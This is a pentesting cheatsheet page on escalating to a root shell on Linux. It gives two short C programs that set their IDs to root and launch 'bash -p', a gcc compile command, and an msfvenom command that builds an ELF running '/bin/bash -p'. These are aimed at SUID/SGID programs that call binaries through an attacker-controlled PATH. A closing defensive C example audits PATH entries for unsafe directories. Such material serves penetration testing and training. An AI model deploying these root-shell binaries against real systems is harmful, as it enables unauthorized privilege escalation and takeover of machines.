# Load a shell with a simple executable

> [!note]
> Adapted from [slyth11907 / Cheatsheets / Cheatsheet_QuickCShell](https://github.com/slyth11907/Cheatsheets/blob/master/Cheatsheet_QuickCShell).

It's actually trivial to write a C program that loads up a shell.

```c
#include <stdio.h>
#include <unistd.h>

int main(void) {
	/* Set the real and effective IDs to root before starting the shell. */
	setuid(0);
	setgid(0);
	/* -p keeps Bash from dropping privileges. */
	execl("/bin/bash", "/bin/bash", "-p", (char*) NULL);
	return 1; /* only reached if execl() fails */
}
```

Alternate approach:

```c
#define _GNU_SOURCE /* exposes setresuid()/setresgid() in <unistd.h> */
#include <stdio.h>
#include <stdlib.h> /* system() */
#include <unistd.h>

int main(void) {
	/* Set the real, effective and saved IDs to root. */
	setresuid(0, 0, 0);
	setresgid(0, 0, 0);
	system("/bin/bash -p");
	return 0;
}
```

Compile with:

```bash
gcc -fPIC -o /path/to/malicious /path/to/malicious.c
```

Note that this is *almost* identical to [[Exploit LD_PRELOAD|the LD\_PRELOAD trick]]; the primary differences are:

- Use `main()` instead of `_init()` as our entry point.
- Compile without `-shared` and `-nostartfiles`.

A simple binary like this is useful for exploiting SUID/SGID applications that call other executables from a part of the PATH that we control.

> [!tip]
> [[Avoid dropping privileges with SUID Bash|Remember that the -p flag is required to keep Bash from dropping privileges!]]

## Using Metasploit

Metasploit's [[msfvenom]] tool can generate binaries that launch any command as root (useful for exploiting SUID/SGID applications that call other executables from a part of the PATH that we control).

```bash
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf \
	-o shell.elf
```

> [!tip]
> [[Avoid dropping privileges with SUID Bash|Remember that the -p flag is required to keep Bash from dropping privileges!]]
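
The SUID/SGID PATH condition described above, seen from the maintainer's side: an added example (not from the original cheatsheet) that audits a colon-separated PATH for entries a privileged program should not trust. The function names, the `trusted_owner` parameter and the sample PATH are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Verdict for one PATH entry, from the point of view of a privileged program. */
enum path_risk { PATH_OK, PATH_RELATIVE, PATH_MISSING, PATH_WRITABLE };

/* Audit one directory. trusted_owner is the only UID allowed to own it
 * (0 for a SUID-root program); this parameter is an assumption of the example. */
enum path_risk audit_dir(const char *dir, uid_t trusted_owner)
{
    struct stat sb;

    if (dir[0] != '/')                 /* "" and "." resolve to the caller's cwd */
        return PATH_RELATIVE;
    if (stat(dir, &sb) != 0 || !S_ISDIR(sb.st_mode))
        return PATH_MISSING;           /* absent entries can be created later */
    if (sb.st_uid != trusted_owner || (sb.st_mode & (S_IWGRP | S_IWOTH)))
        return PATH_WRITABLE;          /* someone else can plant a binary here */
    return PATH_OK;
}

/* Walk a colon-separated PATH string and count entries that are not PATH_OK. */
int count_risky_entries(const char *path, uid_t trusted_owner)
{
    char dir[4096];
    int risky = 0;

    for (const char *p = path; ; ) {
        size_t len = strcspn(p, ":");
        if (len >= sizeof dir) {
            risky++;                   /* over-long entry: treat as suspicious */
        } else {
            memcpy(dir, p, len);
            dir[len] = '\0';
            if (audit_dir(dir, trusted_owner) != PATH_OK)
                risky++;
        }
        if (p[len] == '\0')
            break;
        p += len + 1;
    }
    return risky;
}

int main(void)
{
    /* Constructed sample PATH: empty entry, relative entry, then /usr/bin. */
    printf("risky entries: %d\n", count_risky_entries(":bin:/usr/bin", 0));
    return 0;
}
```

A privileged program avoids the condition altogether by calling its helpers by absolute path with a fixed environment; the audit is for cases where an inherited PATH has to be used.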